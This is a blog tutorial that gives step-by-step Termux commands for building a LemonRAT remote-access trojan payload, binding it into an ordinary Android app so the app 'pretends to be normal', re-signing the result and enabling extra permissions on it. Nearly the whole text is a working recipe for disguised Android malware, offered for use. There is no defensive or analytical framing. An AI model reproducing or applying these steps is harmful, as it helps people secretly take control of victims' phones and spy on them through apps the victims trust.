How to bind lemonrat payload with android apps

Hi guys welcome to the Mr.Ethical YT blog. If you are searching for "how to bind lemon rat payload with normal apps" then you are in the correct place and reading the right article. Today we are going to learn to bind lemon rat malacious payload with normal apk and thats pretends to be normal.


  1. Apkmod
  2. Apkmod2
  3. Lemon Rat


First of all install the termux application from F-droid if you haven't installed it already.
Update and upgrade it's repositories.
apt-get update  && apt-get upgrade-y 

Give the storage permission to termux.


Install wget package

pkg install wget 

Download apkmod installer script.


Run the installer script.


Download apkmod .deb file and Lemon rat .deb file. Copy of them to termux home directory.

cp /sdcard/Download/apkmod2_1.3-4_aarch64.deb $HOME && cp sdcard/Download/lemon_2.1-2_all.deb $HOME 

 Install apkmod2 with dpkg.

dpkg -i apkmod2_1.3-4_aarch64.deb 

 Install lemon rat with dpkg.

dpkg -i lemon_2.1-2_all.deb 

 Run lemon to check is it installed.


The lemon server will start and stop it by clicking on CTRL and c.

 Go to this directory /data/data/com.termux/files/usr/share/lemon/server

cd /data/data/com.termux/files/usr/share/lemon/server 

Open maindb.json file with nano.

nano maindb.json 

Copy this hash "81dc9bdb52d04dc20036dbd8313ed055" and paste in the password parameter.


"password": "81dc9bdb52d04dc20036dbd8313ed055"

It should look like this.

Now save it by clicking CTRL and s then CTRL and x to exit.

Change directory to home.

cd $HOME

Run lemonrat server by the command lemon


Open browser and navigate to the url localhost:22553 and login with the username and password you had set while installation of lemonrat


After login go to build section and enter the ip then click on build wait until the payload gets builded.After building the payload.Choose the apk in which you want to bind the lemon rat payload.Copy the apk to termux home directory.

cp /pathtoyourapk $HOME 

Then bind with the lemon payload with the command apkmod2 -i yourapkname.

apkmod2 -i yourapkname

It will take little bit time to bind the lemon rat payload with the orginal apk wait until it's get connected.The binded apk will be in the lemon directory with name of L3MON_binded.apk.

Now we need to sign the binded apk with apkmod.

apkmod -s -i lemon/L3MON_binded.apk -o $HOME/example.apk 

 Bypass the permissions with the command given below.

apkmod --enable=perm -i $HOME/example.apk -o $HOME/hack.apk 

 We had successfully binded the lemon rat payload with another apk and also bypassed the permissions.

Now copy the apk you bypassed the permissions to internal storage.

That's it for today guys we had successfully binded the lemon rat payload with another apk hope you learnt something new , let's meet in another post until then keep reading the other posts 


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